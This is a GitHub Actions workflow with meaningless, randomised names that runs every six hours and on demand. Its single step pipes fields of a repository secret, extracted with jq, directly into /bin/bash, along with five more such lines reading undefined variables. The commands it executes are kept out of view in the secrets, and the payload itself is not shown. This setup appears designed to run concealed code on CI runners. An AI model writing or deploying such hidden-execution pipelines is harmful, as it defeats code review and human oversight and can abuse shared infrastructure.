name: wudushu4671

on:
  workflow_dispatch:
  schedule:
    - cron: '33 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wudushu4671
        env:
          n924: ${{ secrets.n924 }}
        run: |
          echo $n924 | jq -r .iez37 | /bin/bash
          echo $njujz6028 | jq -r .tjlle4 | /bin/bash
          echo $my084 | jq -r .xgqrt93801 | /bin/bash
          echo $lp51324 | jq -r .g4473 | /bin/bash
          echo $cuca8688 | jq -r .gel2 | /bin/bash
          echo $cy101 | jq -r .ubkds6 | /bin/bash

